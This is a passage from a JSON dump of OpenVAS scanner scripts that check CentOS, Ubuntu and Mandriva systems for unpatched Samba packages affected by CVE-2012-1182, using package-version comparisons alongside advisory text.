or a username for a\n given SID, works as expected after a domain controller is rebooted.\n (BZ#878564)\n\n All users of samba4 are advised to upgrade to these updated packages,\n which fix these issues and add these enhancements.\n\n Warning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat\n Enterprise Linux 6.4 and you have Samba in use, you should make sure that\n you uninstall the package named 'samba4' to avoid conflicts during the\n upgrade.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba4\", rpm:\"samba4~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-client\", rpm:\"samba4-client~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-common\", rpm:\"samba4-common~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-dc\", rpm:\"samba4-dc~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-dc-libs\", rpm:\"samba4-dc-libs~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-devel\", rpm:\"samba4-devel~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-libs\", rpm:\"samba4-libs~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-pidl\", rpm:\"samba4-pidl~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-python\", rpm:\"samba4-python~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-swat\", rpm:\"samba4-swat~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-test\", rpm:\"samba4-test~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind\", rpm:\"samba4-winbind~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind-clients\", rpm:\"samba4-winbind-clients~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind-krb5-locator\", rpm:\"samba4-winbind-krb5-locator~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:30", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1423-1", "cvss3": {}, "published": "2012-04-13T00:00:00", "type": "openvas", "title": "Ubuntu Update for samba USN-1423-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310840980", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840980", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1423_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for samba USN-1423-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1423-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840980\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-13 10:33:26 +0530 (Fri, 13 Apr 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"USN\", value:\"1423-1\");\n script_name(\"Ubuntu Update for samba USN-1423-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(10\\.04 LTS|11\\.10|11\\.04|8\\.04 LTS)\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1423-1\");\n script_tag(name:\"affected\", value:\"samba on Ubuntu 11.10,\n Ubuntu 11.04,\n Ubuntu 10.04 LTS,\n Ubuntu 8.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Brian Gorenc discovered that Samba incorrectly calculated array bounds when\n handling remote procedure calls (RPC) over the network. A remote,\n unauthenticated attacker could exploit this to execute arbitrary code as the\n root user. (CVE-2012-1182)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"2:3.4.7~dfsg-1ubuntu3.9\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"2:3.5.11~dfsg-1ubuntu2.2\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"2:3.5.8~dfsg-1ubuntu2.4\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"3.0.28a-1ubuntu4.18\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:30", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-03-12T00:00:00", "type": "openvas", "title": "CentOS Update for evolution-mapi CESA-2013:0515 centos6", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881654", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881654", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for evolution-mapi CESA-2013:0515 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-March/019320.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881654\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-12 10:00:29 +0530 (Tue, 12 Mar 2013)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2013:0515\");\n script_name(\"CentOS Update for evolution-mapi CESA-2013:0515 centos6\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'evolution-mapi'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n script_tag(name:\"affected\", value:\"evolution-mapi on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"The openchange packages provide libraries to access Microsoft Exchange\n servers using native protocols. Evolution-MAPI uses these libraries to\n integrate the Evolution PIM application with Microsoft Exchange servers.\n\n A flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\n compiler. As OpenChange uses code generated by PIDL, this could have\n resulted in buffer overflows in the way OpenChange handles RPC calls. With\n this update, the code has been generated with an updated version of PIDL to\n correct this issue. (CVE-2012-1182)\n\n The openchange packages have been upgraded to upstream version 1.0, which\n provides a number of bug fixes and enhancements over the previous version,\n including support for the rebased samba4 packages and several API changes.\n (BZ#767672, BZ#767678)\n\n This update also fixes the following bugs:\n\n * When the user tried to modify a meeting with one required attendee and\n himself as the organizer, a segmentation fault occurred in the memcpy()\n function. Consequently, the evolution-data-server application terminated\n unexpectedly with a segmentation fault. This bug has been fixed and\n evolution-data-server no longer crashes in the described scenario.\n (BZ#680061)\n\n * Prior to this update, OpenChange 1.0 was unable to send messages with\n a large message body or with extensive attachment. This was caused by minor\n issues in OpenChange's exchange.idl definitions. This bug has been fixed\n and OpenChange now sends extensive messages without complications.\n (BZ#870405)\n\n All users of openchange are advised to upgrade to these updated packages,\n which fix these issues and add these enhancements.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"evolution-mapi\", rpm:\"evolution-mapi~0.28.3~12.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"evolution-mapi-devel\", rpm:\"evolution-mapi-devel~0.28.3~12.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:43", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-08-03T00:00:00", "type": "openvas", "title": "Mandriva Update for samba MDVSA-2012:055 (samba)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310831574", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831574", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for samba MDVSA-2012:055 (samba)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:055\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831574\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-03 09:50:22 +0530 (Fri, 03 Aug 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"MDVSA\", value:\"2012:055\");\n script_name(\"Mandriva Update for samba MDVSA-2012:055 (samba)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\", re:\"ssh/login/release=MNDK_(2011\\.0|mes5\\.2|2010\\.1)\");\n script_tag(name:\"affected\", value:\"samba on Mandriva Linux 2011.0,\n Mandriva Enterprise Server 5.2,\n Mandriva Linux 2010.1\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"A vulnerability has been found and corrected in samba:\n\n The RPC code generator in Samba 3.x before 3.4.16, 3.5.x before\n 3.5.14, and 3.6.x before 3.6.4 does not implement validation of an\n array length in a manner consistent with validation of array memory\n allocation, which allows remote attackers to execute arbitrary code\n via a crafted RPC call (CVE-2012-1182).\n\n The updated packages have been patched to correct this issue.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MNDK_2011.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libnetapi0\", rpm:\"libnetapi0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi-devel\", rpm:\"libnetapi-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0\", rpm:\"libsmbclient0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-devel\", rpm:\"libsmbclient0-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-static-devel\", rpm:\"libsmbclient0-static-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes0\", rpm:\"libsmbsharemodes0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes-devel\", rpm:\"libsmbsharemodes-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0\", rpm:\"libwbclient0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient-devel\", rpm:\"libwbclient-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mount-cifs\", rpm:\"mount-cifs~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss_wins\", rpm:\"nss_wins~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-domainjoin-gui\", rpm:\"samba-domainjoin-gui~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-server\", rpm:\"samba-server~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netapi0\", rpm:\"lib64netapi0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netapi-devel\", rpm:\"lib64netapi-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0\", rpm:\"lib64smbclient0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0-devel\", rpm:\"lib64smbclient0-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0-static-devel\", rpm:\"lib64smbclient0-static-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbsharemodes0\", rpm:\"lib64smbsharemodes0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbsharemodes-devel\", rpm:\"lib64smbsharemodes-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wbclient0\", rpm:\"lib64wbclient0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wbclient-devel\", rpm:\"lib64wbclient-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"MNDK_mes5.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"libnetapi0\", rpm:\"libnetapi0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi-devel\", rpm:\"libnetapi-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0\", rpm:\"libsmbclient0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-devel\", rpm:\"libsmbclient0-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-static-devel\", rpm:\"libsmbclient0-static-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes0\", rpm:\"libsmbsharemodes0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes-devel\", rpm:\"libsmbsharemodes-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc1\", rpm:\"libtalloc1~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc-devel\", rpm:\"libtalloc-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1\", rpm:\"libtdb1~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb-devel\", rpm:\"libtdb-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0\", rpm:\"libwbclient0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient-devel\", rpm:\"libwbclient-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mount-cifs\", rpm:\"mount-cifs~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss_wins\", rpm:\"nss_wins~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-server\", rpm:\"samba-server~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netapi0\", rpm:\"lib64netapi0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netapi-devel\", rpm:\"lib64netapi-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0\", rpm:\"lib64smbclient0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0-devel\", rpm:\"lib64smbclient0-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0-static-devel\", rpm:\"lib64smbclient0-static-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbsharemodes0\", rpm:\"lib64smbsharemodes0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbsharemodes-devel\", rpm:\"lib64smbsharemodes-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64talloc1\", rpm:\"lib64talloc1~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64talloc-devel\", rpm:\"lib64talloc-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64tdb1\", rpm:\"lib64tdb1~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64tdb-devel\", rpm:\"lib64tdb-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wbclient0\", rpm:\"lib64wbclient0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wbclient-devel\", rpm:\"lib64wbclient-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) 